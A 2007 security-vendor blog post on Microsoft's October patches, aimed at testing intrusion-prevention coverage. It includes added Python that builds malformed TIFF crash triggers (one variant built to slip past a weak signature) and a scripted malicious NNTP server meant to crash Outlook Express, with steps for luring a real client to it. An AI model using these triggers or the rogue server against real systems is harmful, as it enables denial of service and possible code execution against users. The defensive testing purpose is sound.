October 2007 Microsoft Tuesday
Every Microsoft Tuesday is busy here at BreakingPoint Systems, with the entire Strike Team poring over patches, looking at IDA disassemblies, pondering BinDiff graphs, and writing exploits. From early Tuesday morning we (and our scripts) are monitoring the Windows Update site in order to get the patches and bug descriptions as soon as they become available. After that, a quick game of who's-got-what-bug, and we're off to the races.
The October 2007 Microsoft patches cover the following issues:
MS07-055
Vulnerability in Kodak Image Viewer Could Allow Remote Code Execution
References: CVE-2007-2217
The MS07-055 bulletin addresses an issue with Kodak Image Viewer in the mishandling of TIFF images. TIFF files begin with an 8 byte header which consists of byte-order indicator (bytes 0-1), the value 42 (bytes 2-3), and an offset in bytes of the first Image File Directory (IFD), which allows the IFD to be located anywhere in the file. An IFD consists of a count of the number of directory entries (2 bytes) followed by a sequence of 12-byte entries, followed by a 4-byte offset of the next IFD (or 0 if none). A valid TIFF file must contain at least one IFD.
The bug lies in the application's processing of one particular IFD entry, BitsPerSample. Like every IFD entry, it consists of a 2-byte tag (258), a 2-byte type (3, SHORT), a 4-byte count of values, and a 4-byte value field. Per the TIFF spec, values that fit in 4 bytes are stored inline in that field; larger arrays are stored elsewhere and the field holds their offset. Three SHORT values for an RGB image take 6 bytes, so BitsPerSample is stored out of line. To trigger the bug, point that offset at an arbitrary location; as the parser attempts to read the values from the bogus location, the application crashes. This crash is currently being investigated further by the BreakingPoint Strike Team in order to determine exactly where the application faults, and to develop a proof-of-concept exploit for the bug.
Here is an example TIFF file: [image]
Here is the crash caught in windbg: [image]
The BreakingPoint Strike Team performed independent testing of one inline security device after applying the vendor's security pack that included coverage for this bug, and found an interesting result. The signature for this bug does not cover the full range of files that can trigger it. We found that this particular inline security device only provides coverage for MS07-055 when all of the following conditions are met:
- The transport is HTTP
- The TIFF file is encoded using little-endian byte ordering
- The IFD structure is located within the first 310 bytes of the file
In concrete terms: we sent 8 strikes for this bug through the device, and 0 were detected. That is insufficient coverage for this vulnerability by this particular device.
Multiple strikes covering various transports and formats for this bug will be included in the StrikePack released on October 11, 2007.
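To make the structures described above concrete, here is an added example in Python. It is not BreakingPoint's strike code or anything from the original post: it builds a minimal single-IFD TIFF, once benign and once with the BitsPerSample offset pointing outside the file, and runs a bounds-checking IFD walker of the kind any parser (or any signature that wants real coverage) needs. It also emits the same trigger as a big-endian file with the IFD pushed to byte 4096, the sort of variant a signature keyed to little-endian files with an early IFD would miss. The field layout follows the TIFF 6.0 specification; the sample files are constructed here and are skeletons rather than decodable images, and the 0x7FFFFFF0 offset and the 4096 placement are arbitrary choices.

```python
import struct

TAG_BITS_PER_SAMPLE = 258
TYPE_SHORT = 3
# Byte width of the TIFF 6.0 baseline field types: BYTE, ASCII, SHORT, LONG, RATIONAL.
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8}
BYTE_ORDER = {"<": b"II", ">": b"MM"}


def build_tiff(entries, endian="<", ifd_offset=8, tail=b""):
    """Assemble a minimal single-IFD TIFF (constructed test data, not a real image).

    entries: list of (tag, type, count, value_or_offset), written as 12-byte IFD entries.
    The IFD is placed at ifd_offset (the header's offset field points there); `tail` is
    appended after the IFD so out-of-line field values can be stored at a known position.
    """
    header = BYTE_ORDER[endian] + struct.pack(endian + "HI", 42, ifd_offset)
    ifd = struct.pack(endian + "H", len(entries))
    for tag, typ, count, value in entries:
        ifd += struct.pack(endian + "HHII", tag, typ, count, value)
    ifd += struct.pack(endian + "I", 0)  # offset of next IFD: 0 means none
    return header + b"\x00" * (ifd_offset - len(header)) + ifd + tail


def ifd_end(n_entries, ifd_offset=8):
    """First byte after an IFD: 2-byte count + 12 bytes per entry + 4-byte next-IFD pointer."""
    return ifd_offset + 2 + 12 * n_entries + 4


def check_ifd(data):
    """Walk the first IFD and report every out-of-line value array that does not fit in the file."""
    problems = []
    if len(data) < 8:
        return ["truncated header"]
    endian = {b"II": "<", b"MM": ">"}.get(data[:2])
    if endian is None:
        return ["bad byte-order mark %r" % data[:2]]
    magic, ifd_off = struct.unpack_from(endian + "HI", data, 2)
    if magic != 42:
        problems.append("bad magic %d" % magic)
    if ifd_off + 2 > len(data):
        return problems + ["IFD offset %d beyond end of file" % ifd_off]
    (n,) = struct.unpack_from(endian + "H", data, ifd_off)
    if ifd_end(n, ifd_off) > len(data):
        problems.append("IFD with %d entries is truncated" % n)
    for i in range(n):
        pos = ifd_off + 2 + 12 * i
        if pos + 12 > len(data):
            break
        tag, typ, count, value = struct.unpack_from(endian + "HHII", data, pos)
        size = TYPE_SIZES.get(typ)
        if size is None:
            problems.append("tag %d: unknown field type %d" % (tag, typ))
            continue
        total = size * count
        # TIFF rule: values that fit in 4 bytes live inline in the value field; otherwise the
        # field is an offset, and that is the read a parser must bounds-check before following.
        if total > 4 and value + total > len(data):
            problems.append("tag %d: %d values at offset %d run past end of file" % (tag, count, value))
    return problems


# Constructed samples. Benign: three 8-bit samples (RGB) stored out of line right after the IFD.
benign = build_tiff([(TAG_BITS_PER_SAMPLE, TYPE_SHORT, 3, ifd_end(1))],
                    tail=struct.pack("<HHH", 8, 8, 8))
# Same entry, but the offset points far outside the file (arbitrary value).
bad_le = build_tiff([(TAG_BITS_PER_SAMPLE, TYPE_SHORT, 3, 0x7FFFFFF0)])
# The same trigger, big-endian, with the IFD at byte 4096 instead of byte 8.
bad_be_late = build_tiff([(TAG_BITS_PER_SAMPLE, TYPE_SHORT, 3, 0x7FFFFFF0)],
                         endian=">", ifd_offset=4096)

if __name__ == "__main__":
    for name, blob in [("benign", benign), ("bad_le", bad_le), ("bad_be_late", bad_be_late)]:
        print(name, len(blob), "bytes:", check_ifd(blob) or "ok")
```

Writing any of the three blobs to a .tif file gives you a test input for a parser or an inline device; the walker flags both malformed variants identically because it bounds-checks the offset rather than matching on byte order or IFD position.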
MS07-056
Security Update for Outlook Express and Windows Mail
References: CVE-2007-3897
The MS07-056 bulletin addresses the mishandling of NNTP server responses to the XHDR command. To exploit this bug, an attacker needs to make the victim's news client connect to an NNTP server under the attacker's control. The easiest way to do this is an HTTP redirect to a news:// URL (an HTTP 301 response, a meta refresh in the HTML, or similar), since it requires no user interaction beyond visiting the attacker-controlled page. The URL will look something like news://news.breakingpointsystems.com/alt.news.breakingpoint.
When Outlook Express interacts with a real NNTP server, the conversation between the client and server typically goes something like this:
< Client initiates connection >
Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
Client: MODE READER
Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
Client: GROUP alt.news.breakingpoint
Server: 211 1 1003 1265 alt.news.breakingpoint
Client: XOVER 1003-1265
Server: 224 Overview Information Follows
Server: < Overview of group articles >
< Client makes requests based on user input >
In order to trigger this bug, we must get the client to issue the XHDR command. XHDR is similar to XOVER, except that the client requests a single header field for a range of articles. A series of XHDR commands therefore requests individual headers, including the From, Subject, Date, Message-ID, References, and Xref headers, for all the articles in the group. So how can we force Outlook Express to send the XHDR command to the server? The key is to return an error response to the XOVER command, causing the client to fall back to XHDR.
The conversation between the client and our modified server goes like this:
< Client initiates connection >
Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
Client: MODE READER
Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
Client: GROUP alt.news.breakingpoint
Server: 211 1 1003 1265 alt.news.breakingpoint
Client: XOVER 1003-1265
Server: 500 Error
Client: XHDR subject 1003-1265
Server: < Overflow of article subject headers >
< Client crashes >
In response to the first XHDR command, the attacker returns more article header lines than the client expects: the client expects entries only for the articles the server announced in the GROUP response. After receiving the oversized reply, Outlook Express crashes with what looks like heap corruption.
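The exchange above, as an added example that is not part of the original post and not BreakingPoint's strike code: a small Python NNTP server that scripts the modified server's side of the conversation (rejecting XOVER with 500 so the client falls back to XHDR, then answering XHDR with far more lines than the advertised 1003-1265 range holds), plus a minimal client that replays the transcript against it so the whole thing runs offline on loopback. The "221 Header follows" status text, the 205 reply to QUIT, and the EXCESS factor of 10 are assumptions; the example demonstrates the protocol trick and makes no claim about which client versions crash on it.

```python
import socket
import socketserver
import threading

GROUP = "alt.news.breakingpoint"
FIRST, LAST = 1003, 1265
EXCESS = 10  # assumed: XHDR returns this many times more lines than the advertised range
GREETING = "200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed"
# The client side of the transcript, replayed by run_client().
SCRIPT = ["MODE READER", f"GROUP {GROUP}", f"XOVER {FIRST}-{LAST}",
          f"XHDR subject {FIRST}-{LAST}", "QUIT"]


def xhdr_body(header, first, last, factor):
    """One '<article-number> <value>' line per article, `factor` times more than the range holds."""
    return [f"{first + i} {header}-{i}" for i in range((last - first + 1) * factor)]


def nntp_reply(command):
    """Reply lines for one client command; multi-line replies are terminated by a lone '.'."""
    verb, _, args = command.strip().partition(" ")
    verb = verb.upper()
    if verb == "MODE":
        return [GREETING]
    if verb == "GROUP":
        return [f"211 1 {FIRST} {LAST} {GROUP}"]  # exactly the GROUP reply shown in the transcript
    if verb == "XOVER":
        return ["500 Error"]  # rejecting XOVER is what makes the client fall back to XHDR
    if verb == "XHDR":
        header = args.split()[0] if args else "subject"
        return ["221 Header follows"] + xhdr_body(header, FIRST, LAST, EXCESS) + ["."]
    if verb == "QUIT":
        return ["205 Goodbye"]
    return ["500 Error"]


class ScriptedNNTP(socketserver.StreamRequestHandler):
    """Serves the scripted conversation to whatever connects, e.g. a news:// client."""
    def handle(self):
        self.wfile.write((GREETING + "\r\n").encode("ascii"))
        for raw in self.rfile:
            line = raw.decode("latin-1")
            self.wfile.write("".join(r + "\r\n" for r in nntp_reply(line)).encode("latin-1"))
            if line.strip().upper() == "QUIT":
                break


def serve(host="127.0.0.1", port=0):
    """Start the server on a background thread; port 0 lets the OS pick a free port."""
    srv = socketserver.ThreadingTCPServer((host, port), ScriptedNNTP)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def read_reply(f):
    """Read one reply: the status line plus, for 221 (XHDR), the body up to the '.' terminator."""
    status = f.readline().decode("latin-1").rstrip("\r\n")
    body = []
    if status.startswith("221"):
        while True:
            line = f.readline().decode("latin-1").rstrip("\r\n")
            if line == ".":
                break
            body.append(line)
    return status, body


def run_client(host, port):
    """Replay SCRIPT against the server; return {verb: (status line, number of body lines)}."""
    result = {}
    with socket.create_connection((host, port)) as s, s.makefile("rwb") as f:
        result["greeting"] = (read_reply(f)[0], 0)
        for cmd in SCRIPT:
            f.write((cmd + "\r\n").encode("ascii"))
            f.flush()
            status, body = read_reply(f)
            result[cmd.split()[0]] = (status, len(body))
    return result


def scripted_conversation():
    """Bring up the server, run the client against it, shut it down, and return the client's view."""
    srv = serve()
    try:
        return run_client(*srv.server_address)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for verb, (status, n_lines) in scripted_conversation().items():
        print(f"{verb:8} -> {status}" + (f" (+{n_lines} body lines)" if n_lines else ""))
```

To point a real news client at it, call serve(port=119) as a privileged user and redirect the browser to news://<host>/alt.news.breakingpoint; the scripted client exists so the server's behaviour can be checked without one.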
Coverage for this bug will be included in the StrikePack released on October 11, 2007.
MS07-057
Cumulative Security Update for Internet Explorer
References: CVE-2007-3893, CVE-2007-3892, CVE-2007-1091, CVE-2007-3826
The MS07-057 bulletin addresses four vulnerabilities across multiple versions of Internet Explorer. Three of them are address bar spoofing issues involving the onunload and onbeforeunload event handlers. These spoofing issues can be annoying, but they present a low level of risk; a demonstration of one of them can be found on Michal Zalewski's IETrap3 page. The fourth issue is rated critical by Microsoft and allows arbitrary code execution. The Secunia advisory states that the bug occurs when multiple file downloads are queued at the same time. The BreakingPoint Strike Team is still working on this flaw and hopes to reproduce it in time for the upcoming StrikePack.
MS07-058
Vulnerability in RPC Could Allow Denial of Service
The MS07-058 bulletin addresses a denial of service flaw in the RPCSS service. RPCSS is vulnerable to a denial of service triggered during authentication: invalid NTLMSSP data carried inside DCERPC traffic causes a crash in rpcrt4.dll, which terminates the RPCSS service and ultimately forces a reboot of the entire system. The BreakingPoint Strike Team is currently working on providing coverage for this vulnerability.
MS07-059
Vulnerability in Windows SharePoint Services Could Result in Elevation of Privilege
The MS07-059 bulletin addresses a cross-site scripting (XSS) vulnerability in the SharePoint service. This vulnerability can be used to hijack the session of another SharePoint user, if the attacker can convince the victim to access a specific URL after authenticating with the SharePoint server. We have reproduced this in-house and plan on including coverage for this flaw in the upcoming StrikePack.
MS07-060
Vulnerability in Microsoft Word Could Allow Remote Code Execution
The MS07-060 bulletin addresses a memory corruption vulnerability in Microsoft Word 2002. At this time, we have not been able to reproduce this flaw or locate an example exploit. As far as we can tell, most security vendors are using the same sample file to develop their signatures, and are not looking for the actual vulnerability.